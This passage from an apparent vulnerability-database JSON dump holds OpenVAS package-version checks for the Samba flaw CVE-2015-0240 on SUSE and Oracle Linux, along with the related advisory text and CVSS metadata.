isrpmvuln(pkg:\"libsmbclient-raw0-32bit\", rpm:\"libsmbclient-raw0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo-32bit\", rpm:\"libsmbclient-raw0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-32bit\", rpm:\"libsmbconf0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbconf0-debuginfo-32bit\", rpm:\"libsmbconf0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-32bit\", rpm:\"libsmbldap0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbldap0-debuginfo-32bit\", rpm:\"libsmbldap0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-32bit\", rpm:\"libtevent-util0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-util0-debuginfo-32bit\", rpm:\"libtevent-util0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-32bit\", rpm:\"samba-libs-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs-debuginfo-32bit\", rpm:\"samba-libs-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~4.1.12~16.1\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851034", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851034", "title": "SuSE Update for Samba SUSE-SU-2015:0386-1 (Samba)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0386_1.nasl 12381 2018-11-16 11:16:30Z cfischer 
$\n#\n# SuSE Update for Samba SUSE-SU-2015:0386-1 (Samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851034\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 18:36:46 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for Samba SUSE-SU-2015:0386-1 (Samba)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba has been updated to fix one security issue:\n\n * CVE-2015-0240: Don't call talloc_free on an uninitialized pointer\n (bnc#917376).\n\n Additionally, these 
non-security issues have been fixed:\n\n * Realign the winbind request structure following\n require_membership_of field expansion (bnc#913001).\n\n * Reuse connections derived from DFS referrals (bso#10123,\n fate#316512).\n\n * Set domain/workgroup based on authentication callback value\n (bso#11059).\n\n * Fix spoolss error response marshalling (bso#10984).\n\n * Fix spoolss EnumJobs and GetJob responses (bso#10905, bnc#898031).\n\n * Fix handling of bad EnumJobs levels (bso#10898).\n\n * Fix small memory-leak in the background print process (bnc#899558).\n\n * Prune idle or hung connections older than 'winbind request timeout'\n (bso#3204, bnc#872912).\n\n * Build: disable mmap on s390 systems (bnc#886193, bnc#882356).\n\n * Only update the printer share inventory when needed (bnc#883870).\n\n * Avoid double-free in get_print_db_byname (bso#10699).\n\n Security Issues:\n\n * CVE-2015-0240\");\n script_tag(name:\"affected\", value:\"Samba on SUSE Linux Enterprise Server 11 SP2 LTSS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0386_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP2\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~12.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1\", rpm:\"libtalloc1~3.4.3~1.54.39\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1-32bit\", rpm:\"libtalloc1-32bit~3.4.3~1.54.39\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~0.33.43.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850777", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850777", "title": "SuSE Update for Samba SUSE-SU-2015:0371-1 (Samba)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 
gb_suse_2015_0371_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for Samba SUSE-SU-2015:0371-1 (Samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850777\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 15:27:20 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for Samba SUSE-SU-2015:0371-1 (Samba)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba has been updated to fix one security issue:\n\n * CVE-2015-0240: Don't call talloc_free on an 
uninitialized pointer\n (bnc#917376).\n\n Additionally, these non-security issues have been fixed:\n\n * Realign the winbind request structure following\n require_membership_of field expansion (bnc#913001).\n\n * Reuse connections derived from DFS referrals (bso#10123,\n fate#316512).\n\n * Set domain/workgroup based on authentication callback value\n (bso#11059).\n\n * Fix spoolss error response marshalling (bso#10984).\n\n * Fix spoolss EnumJobs and GetJob responses (bso#10905, bnc#898031).\n\n * Fix handling of bad EnumJobs levels (bso#10898).\n\n * Fix small memory-leak in the background print process (bnc#899558).\n\n * Prune idle or hung connections older than 'winbind request timeout'\n (bso#3204, bnc#872912).\");\n\n script_tag(name:\"affected\", value:\"Samba on SUSE Linux Enterprise Server 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0371_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~12.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res 
= isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", 
rpm:\"libwbclient0-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~0.56.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n 
exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0251", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123182", "title": "Oracle Linux Local Check: ELSA-2015-0251", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0251.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123182\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:24 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0251\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0251 - samba security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0251\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0251.html\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.23~14.0.1.el6_6\", 
rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 
isrpmvuln(pkg:\"samba-glusterfs\", rpm:\"samba-glusterfs~3.6.23~14.0.1.el6_6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0250", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123181", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123181", "title": "Oracle Linux Local Check: ELSA-2015-0250", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0250.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
